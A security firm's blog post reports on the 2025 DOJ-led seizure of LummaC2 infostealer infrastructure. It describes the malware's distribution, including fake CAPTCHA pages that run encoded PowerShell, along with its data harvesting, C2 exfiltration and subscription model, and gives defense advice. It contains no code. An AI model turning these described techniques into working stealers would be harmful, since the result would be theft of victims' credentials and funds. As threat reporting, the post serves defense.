LummaC2 Dismantled: DOJ Seizes Infamous Malware-as-a-Service Operation

8 min readMay 29, 2025

Authors: Lisa & 23pds
Editor: Liz

Background

On May 21, 2025, the U.S. Department of Justice (DOJ), in collaboration with Microsoft and law enforcement agencies from multiple countries, successfully seized the core infrastructure of the notorious information-stealing malware, LummaC2. The five key domains and their subdomains taken down were critical operational nodes for LummaC2, and enforcement authorities were able to locate and gain control of over 2,300 associated sites, thereby indirectly impacting many downstream cybercriminal groups reliant on this tool.

According to the FBI, LummaC2 has been used in at least 1.7 million information-stealing attacks, targeting browser autofill data, email and banking credentials, crypto wallet seed phrases, and more. The takedown operation was carried out in phases: two domains were seized on May 19. In response, LummaC2 administrators notified users of three replacement domains on May 20 — but these were also promptly seized the following day.

What Is LummaC2?

LummaC2 (also known as Lumma Stealer) is a C-language-based infostealer malware that operates actively within underground markets. Since its emergence in 2022, it has gained significant popularity among cybercriminals due to its low technical barrier and strong propagation capabilities, and has been employed in a wide range of global cyberattacks.

The malware was developed and sold on Russian-language hacker forums by an actor using the alias “Shamel” (aka “Lumma”) and is marketed through Telegram groups to communicate with “customers.”

Lumma Stealer maintains a robust command-and-control (C2) infrastructure and primarily targets cryptocurrency wallets and 2FA (two-factor authentication) browser extensions in order to extract sensitive information from victims’ devices.

According to a joint advisory from the FBI and the Cybersecurity and Infrastructure Security Agency (CISA), from April to June 2024 alone, the dark web saw 21,000+ LummaC2 logs, marking a 71.7% increase compared to the same period prior. As of May 2025, this malware remains active across multiple sectors of critical infrastructure in the United States.

Common Distribution Methods Include:

Phishing Emails: Masquerading as trusted brands or services, these emails contain malicious links or attachments that redirect users to spoofed websites or malware-hosting servers.
Malvertising: By placing malicious ads in search engine results, attackers lure users into phishing sites disguised as Chrome updates or legitimate software download pages.
Trojanized Software Bundles: Lumma Stealer is bundled with pirated or “cracked” software installers, often executing silently without user awareness. These installers are typically shared through file-sharing platforms.
Obfuscation Techniques: Heavy use of obfuscated strings and collaboration with other malware families allow Lumma Stealer to evade antivirus programs and endpoint detection and response (EDR) systems.

Additionally, LummaC2 has been observed spreading through fake CAPTCHA pages, prompting users to click an “I’m not a robot” button, which triggers the execution of a hidden command embedded in the clipboard.

Attackers guide victims through a fake “verification process”, during which a Base64-encoded PowerShell script is executed on the system, downloading and running Lumma’s malicious payload.

The malware also includes a ClipBanker module, which automatically replaces copied crypto wallet addresses with attacker-controlled ones, enabling fund theft.

Why Is LummaC2 Being Targeted?

1. Widespread Infections and Data Theft

Between March and May 2025, approximately 394,000 Windows devices were reportedly infected with LummaC2. The malware has been used to steal browser data, autofill credentials, banking logins, and cryptocurrency wallet seed phrases.

2. Threat to Critical Infrastructure

LummaC2 has extended its reach into multiple sectors of the U.S. critical infrastructure, posing a serious risk to the cybersecurity of individuals and organizations.

3. Malware-as-a-Service (MaaS) Model

LummaC2 operates under a MaaS business model, allowing cybercriminals to subscribe to the malware as a service — significantly amplifying its impact.

4. International Cooperation Against Cybercrime

This operation was a joint effort between the U.S. DOJ, Microsoft, Europol, Japan’s Cybercrime Control Center, and other global partners, aiming to combat transnational cybercrime through legal and technical means.

How LummaC2 Works

LummaC2 operates in an automated fashion across several key stages:

1. Infection & Deployment

The malware is delivered via phishing emails, disguised downloads, and vulnerability exploitation. Once the victim clicks a malicious pop-up and selects “Yes,” the payload decrypts and connects to a designated C2 server.

Once executed, LummaC2 runs silently in the background, initiating its information theft routines.

2. Information Harvesting

LummaC2 extracts a wide range of sensitive data:

System Information: Including Lumma version, Lumma ID, hardware ID, screen resolution, system language, CPU, and memory size. These are compiled into a system.txt file and stored in memory.
Cryptocurrency Wallets: Specifically targeting wallets like Binance, Electrum, and Ethereum, the malware scans and collects related sensitive files for exfiltration.
Browser Data: LummaC2 checks for browsers such as Chrome, Chromium, Edge, Kometa, Vivaldi, Brave, Opera (Stable/GX/Neon), and Firefox. It attempts to steal account credentials, cookies, browsing history, 2FA extensions, and crypto wallet plugins.
User Documents: The malware scans the %userProfile% directory for .txt files, labels them as “important,” and uploads them to the server.

It makes use of APIs like GetUserNameW, GetComputerNameW, and cpuid to collect system-level data.

3. Encryption & Exfiltration

After collecting data, LummaC2 compresses and encrypts it, then uploads it via HTTP POST requests to the C2 server. The malware supports redundant backups and asynchronous transmission, ensuring successful data delivery even under partial failure.

Often, the malware resides only in memory, leaving no disk footprint when idle. Once connected to its C2, it may deploy additional payloads or write files to disk. It also includes self-protection mechanisms, such as terminating execution when detecting specific usernames or computer names (likely to avoid infecting the developer’s own environment).

4. Data Processing via C2 Dashboard

LummaC2 receives JSON-based configuration commands from the C2 server, parses them, and transmits stolen data back. Attackers can access this data via a web dashboard, which supports real-time viewing, filtering, exporting, geolocation sorting, automatic classification, and device fingerprinting.

At its core, LummaC2 exemplifies the Malware-as-a-Service (MaaS) ecosystem: for a subscription fee (starting at $250/month in 2024), cybercriminals receive updated malware versions, dashboard access, technical support, and custom features.

Service offerings include:

Telegram-based rapid support channels
Automated deployment tools
Encrypted communications and anonymous payment options (e.g., USDT, XMR)

This model significantly lowers the technical barrier to entry, enabling even non-technical criminals to launch attacks, thereby fueling a surge in scams, crypto theft, and corporate espionage.

Defense Recommendations

LummaC2 is only one among many infostealer trojans. Both users and enterprises must adopt a multi-layered defense strategy:

For Individual Users:

Avoid clicking on unknown links or attachments.
Enable two-factor authentication (2FA) to protect accounts even if passwords are compromised.
Clear browser cache and cookies regularly, and avoid storing sensitive data in browsers.
Install and update antivirus software, and apply security patches in a timely manner.

For Enterprises:

Strong Passwords: Internal systems should enforce complex passwords (minimum 8 characters, including numbers, uppercase/lowercase letters, and symbols), and require periodic changes.
Two-Factor Authentication: Use biometric authentication (e.g., fingerprints, iris scans) or physical USB security keys for sensitive systems.
The Four Don’ts: Don’t open suspicious emails. Don’t visit malicious websites. Don’t install unauthorized software. Don’t connect unknown USB drives or portable media to your systems.
Data Backup: Maintain offline backups of critical data and clearly label backup stages to ensure recovery in case of malware compromise.
Regular Scans and Port Closures: Keep antivirus software updated, run full system scans, and disable unnecessary ports and services (e.g., remote access ports 3389, 22, and LAN sharing ports 135, 139, 445).
Employee Security Awareness: Human error is often the weakest link. Raise awareness to prevent phishing, social engineering, malware execution, and weak passwords.
Patch Management: Apply updates to operating systems and third-party applications promptly to prevent exploitation via known vulnerabilities.

Final Thoughts

The takedown of LummaC2 represents not only a technical milestone, but also a model of global collaboration in cybersecurity. As the MaaS model continues to evolve and information-stealing trojans mutate, this case serves as a reminder: in the realm of crypto asset security, device and environment security are just as vital as wallet protection.

SlowMist will continue to monitor developments and leverage its threat intelligence and tracking capabilities to support users and platforms — working together to build a safer and more transparent Web3 ecosystem.

References

[1] https://www.justice.gov/opa/pr/justice-department-seizes-domains-behind-major-information-stealing-malware-operation

[2] https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141b

[3] https://asec.ahnlab.com/jp/85671/

[4] https://cyble.com/blog/lummac2-stealer-a-potent-threat-to-crypto-users/

[5] https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/

About SlowMist

SlowMist is a blockchain security firm established in January 2018. The firm was started by a team with over ten years of network security experience to become a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.

SlowMist offers a variety of services that include but are not limited to security audits, threat information, defense deployment, security consultants, and other security-related services. We also offer AML (Anti-money laundering) software, MistEye (Security Monitoring) , SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.

By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.